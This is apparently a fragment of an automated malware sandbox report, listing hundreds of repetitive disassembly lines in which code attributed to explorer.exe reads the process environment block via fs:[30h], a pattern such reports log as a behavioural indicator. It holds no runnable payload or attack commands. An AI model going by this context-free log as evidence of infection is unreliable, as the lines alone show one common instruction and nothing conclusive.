Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05223D34 mov eax, dword ptr fs:[00000030h] 16_2_05223D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E8D34 mov eax, dword ptr fs:[00000030h] 16_2_052E8D34
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0529A537 mov eax, dword ptr fs:[00000030h] 16_2_0529A537
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05244D3B mov eax, dword ptr fs:[00000030h] 16_2_05244D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05244D3B mov eax, dword ptr fs:[00000030h] 16_2_05244D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05244D3B mov eax, dword ptr fs:[00000030h] 16_2_05244D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523C577 mov eax, dword ptr fs:[00000030h] 16_2_0523C577
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523C577 mov eax, dword ptr fs:[00000030h] 16_2_0523C577
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05253D43 mov eax, dword ptr fs:[00000030h] 16_2_05253D43
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05293540 mov eax, dword ptr fs:[00000030h] 16_2_05293540
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052C3D40 mov eax, dword ptr fs:[00000030h] 16_2_052C3D40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05237D50 mov eax, dword ptr fs:[00000030h] 16_2_05237D50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E05AC mov eax, dword ptr fs:[00000030h] 16_2_052E05AC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E05AC mov eax, dword ptr fs:[00000030h] 16_2_052E05AC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052435A1 mov eax, dword ptr fs:[00000030h] 16_2_052435A1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05241DB5 mov eax, dword ptr fs:[00000030h] 16_2_05241DB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05241DB5 mov eax, dword ptr fs:[00000030h] 16_2_05241DB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05241DB5 mov eax, dword ptr fs:[00000030h] 16_2_05241DB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05242581 mov eax, dword ptr fs:[00000030h] 16_2_05242581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05242581 mov eax, dword ptr fs:[00000030h] 16_2_05242581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05242581 mov eax, dword ptr fs:[00000030h] 16_2_05242581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05242581 mov eax, dword ptr fs:[00000030h] 16_2_05242581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05212D8A mov eax, dword ptr fs:[00000030h] 16_2_05212D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05212D8A mov eax, dword ptr fs:[00000030h] 16_2_05212D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05212D8A mov eax, dword ptr fs:[00000030h] 16_2_05212D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05212D8A mov eax, dword ptr fs:[00000030h] 16_2_05212D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05212D8A mov eax, dword ptr fs:[00000030h] 16_2_05212D8A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524FD9B mov eax, dword ptr fs:[00000030h] 16_2_0524FD9B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524FD9B mov eax, dword ptr fs:[00000030h] 16_2_0524FD9B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522D5E0 mov eax, dword ptr fs:[00000030h] 16_2_0522D5E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522D5E0 mov eax, dword ptr fs:[00000030h] 16_2_0522D5E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DFDE2 mov eax, dword ptr fs:[00000030h] 16_2_052DFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DFDE2 mov eax, dword ptr fs:[00000030h] 16_2_052DFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DFDE2 mov eax, dword ptr fs:[00000030h] 16_2_052DFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DFDE2 mov eax, dword ptr fs:[00000030h] 16_2_052DFDE2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052C8DF1 mov eax, dword ptr fs:[00000030h] 16_2_052C8DF1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296DC9 mov eax, dword ptr fs:[00000030h] 16_2_05296DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296DC9 mov eax, dword ptr fs:[00000030h] 16_2_05296DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296DC9 mov eax, dword ptr fs:[00000030h] 16_2_05296DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296DC9 mov ecx, dword ptr fs:[00000030h] 16_2_05296DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296DC9 mov eax, dword ptr fs:[00000030h] 16_2_05296DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296DC9 mov eax, dword ptr fs:[00000030h] 16_2_05296DC9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524BC2C mov eax, dword ptr fs:[00000030h] 16_2_0524BC2C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E740D mov eax, dword ptr fs:[00000030h] 16_2_052E740D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E740D mov eax, dword ptr fs:[00000030h] 16_2_052E740D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E740D mov eax, dword ptr fs:[00000030h] 16_2_052E740D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296C0A mov eax, dword ptr fs:[00000030h] 16_2_05296C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296C0A mov eax, dword ptr fs:[00000030h] 16_2_05296C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296C0A mov eax, dword ptr fs:[00000030h] 16_2_05296C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296C0A mov eax, dword ptr fs:[00000030h] 16_2_05296C0A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1C06 mov eax, dword ptr fs:[00000030h] 16_2_052D1C06
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523746D mov eax, dword ptr fs:[00000030h] 16_2_0523746D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524A44B mov eax, dword ptr fs:[00000030h] 16_2_0524A44B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052AC450 mov eax, dword ptr fs:[00000030h] 16_2_052AC450
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052AC450 mov eax, dword ptr fs:[00000030h] 16_2_052AC450
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522849B mov eax, dword ptr fs:[00000030h] 16_2_0522849B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D14FB mov eax, dword ptr fs:[00000030h] 16_2_052D14FB
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296CF0 mov eax, dword ptr fs:[00000030h] 16_2_05296CF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296CF0 mov eax, dword ptr fs:[00000030h] 16_2_05296CF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05296CF0 mov eax, dword ptr fs:[00000030h] 16_2_05296CF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E8CD6 mov eax, dword ptr fs:[00000030h] 16_2_052E8CD6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05214F2E mov eax, dword ptr fs:[00000030h] 16_2_05214F2E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05214F2E mov eax, dword ptr fs:[00000030h] 16_2_05214F2E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524E730 mov eax, dword ptr fs:[00000030h] 16_2_0524E730
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523B73D mov eax, dword ptr fs:[00000030h] 16_2_0523B73D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523B73D mov eax, dword ptr fs:[00000030h] 16_2_0523B73D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E070D mov eax, dword ptr fs:[00000030h] 16_2_052E070D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E070D mov eax, dword ptr fs:[00000030h] 16_2_052E070D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524A70E mov eax, dword ptr fs:[00000030h] 16_2_0524A70E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524A70E mov eax, dword ptr fs:[00000030h] 16_2_0524A70E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523F716 mov eax, dword ptr fs:[00000030h] 16_2_0523F716
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052AFF10 mov eax, dword ptr fs:[00000030h] 16_2_052AFF10
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052AFF10 mov eax, dword ptr fs:[00000030h] 16_2_052AFF10
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522FF60 mov eax, dword ptr fs:[00000030h] 16_2_0522FF60
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E8F6A mov eax, dword ptr fs:[00000030h] 16_2_052E8F6A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522EF40 mov eax, dword ptr fs:[00000030h] 16_2_0522EF40
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05228794 mov eax, dword ptr fs:[00000030h] 16_2_05228794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05297794 mov eax, dword ptr fs:[00000030h] 16_2_05297794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05297794 mov eax, dword ptr fs:[00000030h] 16_2_05297794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05297794 mov eax, dword ptr fs:[00000030h] 16_2_05297794
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052537F5 mov eax, dword ptr fs:[00000030h] 16_2_052537F5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521E620 mov eax, dword ptr fs:[00000030h] 16_2_0521E620
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052CFE3F mov eax, dword ptr fs:[00000030h] 16_2_052CFE3F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521C600 mov eax, dword ptr fs:[00000030h] 16_2_0521C600
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521C600 mov eax, dword ptr fs:[00000030h] 16_2_0521C600
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521C600 mov eax, dword ptr fs:[00000030h] 16_2_0521C600
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05248E00 mov eax, dword ptr fs:[00000030h] 16_2_05248E00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D1608 mov eax, dword ptr fs:[00000030h] 16_2_052D1608
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524A61C mov eax, dword ptr fs:[00000030h] 16_2_0524A61C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524A61C mov eax, dword ptr fs:[00000030h] 16_2_0524A61C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522766D mov eax, dword ptr fs:[00000030h] 16_2_0522766D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523AE73 mov eax, dword ptr fs:[00000030h] 16_2_0523AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523AE73 mov eax, dword ptr fs:[00000030h] 16_2_0523AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523AE73 mov eax, dword ptr fs:[00000030h] 16_2_0523AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523AE73 mov eax, dword ptr fs:[00000030h] 16_2_0523AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523AE73 mov eax, dword ptr fs:[00000030h] 16_2_0523AE73
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05227E41 mov eax, dword ptr fs:[00000030h] 16_2_05227E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05227E41 mov eax, dword ptr fs:[00000030h] 16_2_05227E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05227E41 mov eax, dword ptr fs:[00000030h] 16_2_05227E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05227E41 mov eax, dword ptr fs:[00000030h] 16_2_05227E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05227E41 mov eax, dword ptr fs:[00000030h] 16_2_05227E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05227E41 mov eax, dword ptr fs:[00000030h] 16_2_05227E41
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DAE44 mov eax, dword ptr fs:[00000030h] 16_2_052DAE44
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052DAE44 mov eax, dword ptr fs:[00000030h] 16_2_052DAE44
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E0EA5 mov eax, dword ptr fs:[00000030h] 16_2_052E0EA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E0EA5 mov eax, dword ptr fs:[00000030h] 16_2_052E0EA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E0EA5 mov eax, dword ptr fs:[00000030h] 16_2_052E0EA5
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052946A7 mov eax, dword ptr fs:[00000030h] 16_2_052946A7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052AFE87 mov eax, dword ptr fs:[00000030h] 16_2_052AFE87
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052276E2 mov eax, dword ptr fs:[00000030h] 16_2_052276E2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052416E0 mov ecx, dword ptr fs:[00000030h] 16_2_052416E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05258EC7 mov eax, dword ptr fs:[00000030h] 16_2_05258EC7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052436CC mov eax, dword ptr fs:[00000030h] 16_2_052436CC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052CFEC0 mov eax, dword ptr fs:[00000030h] 16_2_052CFEC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E8ED6 mov eax, dword ptr fs:[00000030h] 16_2_052E8ED6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05234120 mov eax, dword ptr fs:[00000030h] 16_2_05234120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05234120 mov eax, dword ptr fs:[00000030h] 16_2_05234120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05234120 mov eax, dword ptr fs:[00000030h] 16_2_05234120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05234120 mov eax, dword ptr fs:[00000030h] 16_2_05234120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05234120 mov ecx, dword ptr fs:[00000030h] 16_2_05234120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524513A mov eax, dword ptr fs:[00000030h] 16_2_0524513A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524513A mov eax, dword ptr fs:[00000030h] 16_2_0524513A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05219100 mov eax, dword ptr fs:[00000030h] 16_2_05219100
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05219100 mov eax, dword ptr fs:[00000030h] 16_2_05219100
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05219100 mov eax, dword ptr fs:[00000030h] 16_2_05219100
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521C962 mov eax, dword ptr fs:[00000030h] 16_2_0521C962
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521B171 mov eax, dword ptr fs:[00000030h] 16_2_0521B171
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521B171 mov eax, dword ptr fs:[00000030h] 16_2_0521B171
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523B944 mov eax, dword ptr fs:[00000030h] 16_2_0523B944
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523B944 mov eax, dword ptr fs:[00000030h] 16_2_0523B944
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052461A0 mov eax, dword ptr fs:[00000030h] 16_2_052461A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052461A0 mov eax, dword ptr fs:[00000030h] 16_2_052461A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D49A4 mov eax, dword ptr fs:[00000030h] 16_2_052D49A4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D49A4 mov eax, dword ptr fs:[00000030h] 16_2_052D49A4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D49A4 mov eax, dword ptr fs:[00000030h] 16_2_052D49A4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D49A4 mov eax, dword ptr fs:[00000030h] 16_2_052D49A4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052969A6 mov eax, dword ptr fs:[00000030h] 16_2_052969A6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052951BE mov eax, dword ptr fs:[00000030h] 16_2_052951BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052951BE mov eax, dword ptr fs:[00000030h] 16_2_052951BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052951BE mov eax, dword ptr fs:[00000030h] 16_2_052951BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052951BE mov eax, dword ptr fs:[00000030h] 16_2_052951BE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h] 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h] 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF mov eax, dword ptr fs:[00000030h] 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h] 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h] 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF mov eax, dword ptr fs:[00000030h] 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h] 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h] 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF mov eax, dword ptr fs:[00000030h] 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h] 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF mov ecx, dword ptr fs:[00000030h] 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052399BF mov eax, dword ptr fs:[00000030h] 16_2_052399BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523C182 mov eax, dword ptr fs:[00000030h] 16_2_0523C182
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524A185 mov eax, dword ptr fs:[00000030h] 16_2_0524A185
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05242990 mov eax, dword ptr fs:[00000030h] 16_2_05242990
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0521B1E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0521B1E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0521B1E1 mov eax, dword ptr fs:[00000030h] 16_2_0521B1E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052A41E8 mov eax, dword ptr fs:[00000030h] 16_2_052A41E8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522B02A mov eax, dword ptr fs:[00000030h] 16_2_0522B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522B02A mov eax, dword ptr fs:[00000030h] 16_2_0522B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522B02A mov eax, dword ptr fs:[00000030h] 16_2_0522B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0522B02A mov eax, dword ptr fs:[00000030h] 16_2_0522B02A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524002D mov eax, dword ptr fs:[00000030h] 16_2_0524002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524002D mov eax, dword ptr fs:[00000030h] 16_2_0524002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524002D mov eax, dword ptr fs:[00000030h] 16_2_0524002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524002D mov eax, dword ptr fs:[00000030h] 16_2_0524002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524002D mov eax, dword ptr fs:[00000030h] 16_2_0524002D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A830 mov eax, dword ptr fs:[00000030h] 16_2_0523A830
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A830 mov eax, dword ptr fs:[00000030h] 16_2_0523A830
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A830 mov eax, dword ptr fs:[00000030h] 16_2_0523A830
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523A830 mov eax, dword ptr fs:[00000030h] 16_2_0523A830
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E4015 mov eax, dword ptr fs:[00000030h] 16_2_052E4015
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E4015 mov eax, dword ptr fs:[00000030h] 16_2_052E4015
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05297016 mov eax, dword ptr fs:[00000030h] 16_2_05297016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05297016 mov eax, dword ptr fs:[00000030h] 16_2_05297016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05297016 mov eax, dword ptr fs:[00000030h] 16_2_05297016
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052E1074 mov eax, dword ptr fs:[00000030h] 16_2_052E1074
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052D2073 mov eax, dword ptr fs:[00000030h] 16_2_052D2073
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05230050 mov eax, dword ptr fs:[00000030h] 16_2_05230050
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05230050 mov eax, dword ptr fs:[00000030h] 16_2_05230050
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052420A0 mov eax, dword ptr fs:[00000030h] 16_2_052420A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052420A0 mov eax, dword ptr fs:[00000030h] 16_2_052420A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052420A0 mov eax, dword ptr fs:[00000030h] 16_2_052420A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052420A0 mov eax, dword ptr fs:[00000030h] 16_2_052420A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052420A0 mov eax, dword ptr fs:[00000030h] 16_2_052420A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052420A0 mov eax, dword ptr fs:[00000030h] 16_2_052420A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052590AF mov eax, dword ptr fs:[00000030h] 16_2_052590AF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524F0BF mov ecx, dword ptr fs:[00000030h] 16_2_0524F0BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524F0BF mov eax, dword ptr fs:[00000030h] 16_2_0524F0BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0524F0BF mov eax, dword ptr fs:[00000030h] 16_2_0524F0BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05219080 mov eax, dword ptr fs:[00000030h] 16_2_05219080
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05293884 mov eax, dword ptr fs:[00000030h] 16_2_05293884
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_05293884 mov eax, dword ptr fs:[00000030h] 16_2_05293884
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052140E1 mov eax, dword ptr fs:[00000030h] 16_2_052140E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052140E1 mov eax, dword ptr fs:[00000030h] 16_2_052140E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052140E1 mov eax, dword ptr fs:[00000030h] 16_2_052140E1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523B8E4 mov eax, dword ptr fs:[00000030h] 16_2_0523B8E4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0523B8E4 mov eax, dword ptr fs:[00000030h] 16_2_0523B8E4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052158EC mov eax, dword ptr fs:[00000030h] 16_2_052158EC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052AB8D0 mov eax, dword ptr fs:[00000030h] 16_2_052AB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052AB8D0 mov ecx, dword ptr fs:[00000030h] 16_2_052AB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052AB8D0 mov eax, dword ptr fs:[00000030h] 16_2_052AB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052AB8D0 mov eax, dword ptr fs:[00000030h] 16_2_052AB8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_052AB8D0 mov eax, dword ptr fs:[00000030h] 16_2_052AB8D0
